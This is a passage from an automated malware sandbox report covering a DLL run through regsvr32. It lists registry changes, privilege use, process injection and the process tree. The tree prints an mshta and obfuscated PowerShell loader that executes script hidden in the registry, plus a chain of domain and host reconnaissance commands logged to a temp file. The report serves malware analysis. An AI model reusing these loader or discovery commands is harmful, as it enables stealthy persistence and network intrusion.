Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ffece5954ed7a6bf283d28ce3cccf569e240c3907c13f708593aa3c6bc89ccab" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = 5c1352a5fcabd801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = bf2224a5fcabd801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c89f2bd41aee2ec830a66132c5645606c291cf54f900f2c9b92cc3650442eca" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000088abffa5fcabd801bc8055a6fcabd801bc8055a6fcabd801dd8d18000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000955e0732000346165346334336438616662356563393064353330373933363261636230303430356330353964326430303662323931653935343335623635393236313434330000b20009000400efbe0955e0730955e0732e00000000000000000000000000000000000000000000000000d6660b00340061006500340063003400330064003800610066006200350065006300390030006400350033003000370039003300360032006100630062003000300034003000350063003000350039006400320064003000300036006200320039003100650039003500340033003500620036003500390032003600310034003400330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000007d0823ea1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34616534633433643861666235656339306435333037393336326163623030343035633035396432643030366232393165393534333562363539323631343433000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007170636a776a646100000000000000008e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa0386187908e889a9f3ecb9a4ab13222f2d42419ff9385462ef709ed11be0e7aa038618790ca000000090000a08500000031535053e28a5846bc4c3843bbfc139326986dce6900000004000000001f0000002c00000053002d0031002d0035002d00320031002d0033003400360033003800340035003300310037002d003900330033003500380032003200380039002d00340035003800310037003700330032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005cd502df000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d7eecab9-6c40-413e-95 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9cea0c2-7e1f-4d89-a5 RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 1716 regsvr32.exe 1716 regsvr32.exe 1520 powershell.exe 1520 powershell.exe 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeregsvr32.exeExplorer.EXEcontrol.exepid process 1520 powershell.exe 1716 regsvr32.exe 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 1028 Explorer.EXE 4028 control.exe 1028 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exeRuntimeBroker.exetasklist.exedescription pid process Token: SeDebugPrivilege 1520 powershell.exe Token: SeShutdownPrivilege 1028 Explorer.EXE Token: SeCreatePagefilePrivilege 1028 Explorer.EXE Token: SeShutdownPrivilege 1028 Explorer.EXE Token: SeCreatePagefilePrivilege 1028 Explorer.EXE Token: SeIncreaseQuotaPrivilege 4012 WMIC.exe Token: SeSecurityPrivilege 4012 WMIC.exe Token: SeTakeOwnershipPrivilege 4012 WMIC.exe Token: SeLoadDriverPrivilege 4012 WMIC.exe Token: SeSystemProfilePrivilege 4012 WMIC.exe Token: SeSystemtimePrivilege 4012 WMIC.exe Token: SeProfSingleProcessPrivilege 4012 WMIC.exe Token: SeIncBasePriorityPrivilege 4012 WMIC.exe Token: SeCreatePagefilePrivilege 4012 WMIC.exe Token: SeBackupPrivilege 4012 WMIC.exe Token: SeRestorePrivilege 4012 WMIC.exe Token: SeShutdownPrivilege 4012 WMIC.exe Token: SeDebugPrivilege 4012 WMIC.exe Token: SeSystemEnvironmentPrivilege 4012 WMIC.exe Token: SeRemoteShutdownPrivilege 4012 WMIC.exe Token: SeUndockPrivilege 4012 WMIC.exe Token: SeManageVolumePrivilege 4012 WMIC.exe Token: 33 4012 WMIC.exe Token: 34 4012 WMIC.exe Token: 35 4012 WMIC.exe Token: 36 4012 WMIC.exe Token: SeIncreaseQuotaPrivilege 4012 WMIC.exe Token: SeSecurityPrivilege 4012 WMIC.exe Token: SeTakeOwnershipPrivilege 4012 WMIC.exe Token: SeLoadDriverPrivilege 4012 WMIC.exe Token: SeSystemProfilePrivilege 4012 WMIC.exe Token: SeSystemtimePrivilege 4012 WMIC.exe Token: SeProfSingleProcessPrivilege 4012 WMIC.exe Token: SeIncBasePriorityPrivilege 4012 WMIC.exe Token: SeCreatePagefilePrivilege 4012 WMIC.exe Token: SeBackupPrivilege 4012 WMIC.exe Token: SeRestorePrivilege 4012 WMIC.exe Token: SeShutdownPrivilege 4012 WMIC.exe Token: SeDebugPrivilege 4012 WMIC.exe Token: SeSystemEnvironmentPrivilege 4012 WMIC.exe Token: SeRemoteShutdownPrivilege 4012 WMIC.exe Token: SeUndockPrivilege 4012 WMIC.exe Token: SeManageVolumePrivilege 4012 WMIC.exe Token: 33 4012 WMIC.exe Token: 34 4012 WMIC.exe Token: 35 4012 WMIC.exe Token: 36 4012 WMIC.exe Token: SeShutdownPrivilege 1028 Explorer.EXE Token: SeCreatePagefilePrivilege 1028 Explorer.EXE Token: SeShutdownPrivilege 3520 RuntimeBroker.exe Token: SeDebugPrivilege 1208 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1028 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeregsvr32.exeExplorer.EXEcontrol.execmd.execmd.exedescription pid process target process PID 1184 wrote to memory of 1716 1184 regsvr32.exe regsvr32.exe PID 1184 wrote to memory of 1716 1184 regsvr32.exe regsvr32.exe PID 1184 wrote to memory of 1716 1184 regsvr32.exe regsvr32.exe PID 376 wrote to memory of 1520 376 mshta.exe powershell.exe PID 376 wrote to memory of 1520 376 mshta.exe powershell.exe PID 1520 wrote to memory of 2812 1520 powershell.exe csc.exe PID 1520 wrote to memory of 2812 1520 powershell.exe csc.exe PID 2812 wrote to memory of 3684 2812 csc.exe cvtres.exe PID 2812 wrote to memory of 3684 2812 csc.exe cvtres.exe PID 1520 wrote to memory of 3736 1520 powershell.exe csc.exe PID 1520 wrote to memory of 3736 1520 powershell.exe csc.exe PID 3736 wrote to memory of 4164 3736 csc.exe cvtres.exe PID 3736 wrote to memory of 4164 3736 csc.exe cvtres.exe PID 1520 wrote to memory of 1028 1520 powershell.exe Explorer.EXE PID 1520 wrote to memory of 1028 1520 powershell.exe Explorer.EXE PID 1716 wrote to memory of 4028 1716 regsvr32.exe control.exe PID 1716 wrote to memory of 4028 1716 regsvr32.exe control.exe PID 1520 wrote to memory of 1028 1520 powershell.exe Explorer.EXE PID 1520 wrote to memory of 1028 1520 powershell.exe Explorer.EXE PID 1716 wrote to memory of 4028 1716 regsvr32.exe control.exe PID 1716 wrote to memory of 4028 1716 regsvr32.exe control.exe PID 1716 wrote to memory of 4028 1716 regsvr32.exe control.exe PID 1028 wrote to memory of 3520 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3520 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3520 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3520 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3784 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3784 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3784 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3784 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 4816 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 4816 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 4816 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 4816 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3256 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3256 1028 Explorer.EXE RuntimeBroker.exe PID 4028 wrote to memory of 4244 4028 control.exe rundll32.exe PID 4028 wrote to memory of 4244 4028 control.exe rundll32.exe PID 4028 wrote to memory of 4244 4028 control.exe rundll32.exe PID 1028 wrote to memory of 3256 1028 Explorer.EXE RuntimeBroker.exe PID 1028 wrote to memory of 3256 1028 Explorer.EXE RuntimeBroker.exe PID 4028 wrote to memory of 4244 4028 control.exe rundll32.exe PID 4028 wrote to memory of 4244 4028 control.exe rundll32.exe PID 1028 wrote to memory of 4196 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 4196 1028 Explorer.EXE cmd.exe PID 4196 wrote to memory of 4012 4196 cmd.exe WMIC.exe PID 4196 wrote to memory of 4012 4196 cmd.exe WMIC.exe PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 4196 wrote to memory of 3084 4196 cmd.exe more.com PID 4196 wrote to memory of 3084 4196 cmd.exe more.com PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 3240 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 1224 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 1224 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 2348 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 2348 1028 Explorer.EXE cmd.exe PID 2348 wrote to memory of 3636 2348 cmd.exe systeminfo.exe PID 2348 wrote to memory of 3636 2348 cmd.exe systeminfo.exe PID 1028 wrote to memory of 1308 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 1308 1028 Explorer.EXE cmd.exe PID 1028 wrote to memory of 1448 1028 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3256
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4816
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3784
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h5⤵PID:4244
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"5⤵PID:3684
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"5⤵PID:4164
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\system32\more.commore3⤵PID:3084
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:3240
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:1224
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:3636 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:1308
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:1448
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:2136 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:3756
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:3588
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:3116
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4924
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:396
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:1272
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:5004
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1956
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4560
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:5076
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:3164
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:3428
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:2076
-
C:\Windows\system32\net.exenet config workstation3⤵PID:3636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:4304
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:3632
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4992
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:3960
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4552
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4508
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:2812
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:3272
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:1160
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:2588 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:856
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"2⤵PID:4352
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:4452
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
44B
MD5f7aea2435aa888b709ca20f816c33bfd
SHA138717c9a73b5f8bd399839cbe0aa57518427e758
SHA256f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA5121ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2KB
MD5debbdb9be3bb09adf5d355ab9c36187a
SHA1f44a6c37253abc4ad266d46b4b62d50398e0c570
SHA256cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643
SHA512f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332
-
Filesize
2KB
MD5debbdb9be3bb09adf5d355ab9c36187a
SHA1f44a6c37253abc4ad266d46b4b62d50398e0c570
SHA256cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643
SHA512f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332
-
Filesize
2KB
MD5d4261765df37d03c995a3f88337551b9
SHA131303377a5d5808157badd5a7be5c87f673d937a
SHA25626b2ede70ff95672d6c7c3ad8a6140e333ff97d8671c56a4ecbf2527ceec3a08
SHA5124b7fa34739bc78de8a0a5d71ea56a47d34f107ba9dd543e87a0e74c92e0f21b14c06c8c1ed904a693b3e2037a52a87ffa8545adc2b6de5b132f1579bc9e4ad83
-
Filesize
2KB
MD5f3732be8e8ad283b090cb47ded28b20b
SHA1c880ff4fcfcc3d92ffaaa02cb0c38151661989b8
SHA256b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b
SHA5121eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a
-
Filesize
2KB
MD5f3732be8e8ad283b090cb47ded28b20b
SHA1c880ff4fcfcc3d92ffaaa02cb0c38151661989b8
SHA256b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b
